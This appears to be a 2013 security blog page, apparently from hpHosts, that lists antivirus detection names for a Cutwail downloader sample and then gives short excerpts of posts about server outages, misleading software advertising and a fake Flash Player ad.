ClamAV : Trojan.Downloader.Small-3221
Kaspersky : HEUR:Trojan.Win32.Generic
BitDefender : Generic.Malware.SFBdld.738AD202
NANO-Antivirus : Virus.Win32.Gen.ccmw
Sophos : Mal/Emogen-Y
F-Secure : Generic.Malware.SFBdld.738AD202
DrWeb : BackDoor.Bulknet.893
VIPRE : Trojan-Downloader.Win32.Cutwail.bz (v)
AntiVir : TR/Spy.Gen
TrendMicro : Mal_DLDER
McAfee-GW-Edition : Trojan-FBGJ!0C699BF88151
Emsisoft : Generic.Malware.SFBdld.738AD202 (B)
Microsoft : TrojanDownloader:Win32/Cutwail.BS
GData : Generic.Malware.SFBdld.738AD202
Commtouch : W32/Injector.A.gen!Eldorado
ESET-NOD32 : a variant of Win32/Wigon.PH
VBA32 : BScope.Trojan.Cutwail.4512
Rising : Trojan.Win32.Generic.14AC42DE
Ikarus : Gen.Trojan
Fortinet : W32/Pushdo.B!tr.bdr
So now we know this campaign is sending not only PWS/Fareit or Cridex but the Trojan/Cutwail spambot too.

Greetz from #MalwareMustDie to all friends, stay safe & be healthy always!

Thursday, 23 May 2013

Quite a few updates over the past few days. First and foremost, the bug with sURL is fixed.

Secondly, whilst the hpHosts site is still having issues, I've modified the config to try and alleviate the issue, so it should stay up longer than it was.

I've also got updates to a few programs going up over the next 72 hours or so (desperate for sleep, and my body and sleeping tablets have decided

Sunday, 19 May 2013

Doing a quick search for something earlier, I stumbled upon pcguide.com, and whilst I'm now used to (but still hate) seeing security sites and support etc. forums plastering ads all over the place (some even in the first and then every other post), I still get irked when I see this kind of thing.


What makes this worse, is that it's not being delivered via an ad network this time - the "advert",

Wednesday, 15 May 2013

Investigating a piracy case earlier, I was absolutely disgusted to see the following, which shows Tuguu, owner of PPI programs such as Doma IQ, engaging in practices so misleading they make hackforums.net look legit.

Not only does this fake Flash Player advert lead straight to a download that is NOT (like you didn't see that coming) Flash, but it is so beyond not being Flash that it

hpHosts server has been down the last couple of hours or so. Aware of the problem and trying to get it resolved.

Sorry for any inconvenience folks.

Monday, 6 May 2013

Yet another instance of misleading advertising by SparkTrust was found a few minutes ago, this time via Google AdWords (surprise, surprise).



And the site you're pointed to also fails miserably to notify you that the program is NOT free, that you HAVE TO PAY FOR IT before it'll actually do anything other than scan.



You'd have thought these companies would've learnt by now, but sadly not,

Saturday, 4 May 2013

Just a note, folks: the incoming mail server started having issues again yesterday (the incoming server is controlled by Domain Monster). Spoke to them today and they're looking into it, but in the meantime it means I can't receive e-mails.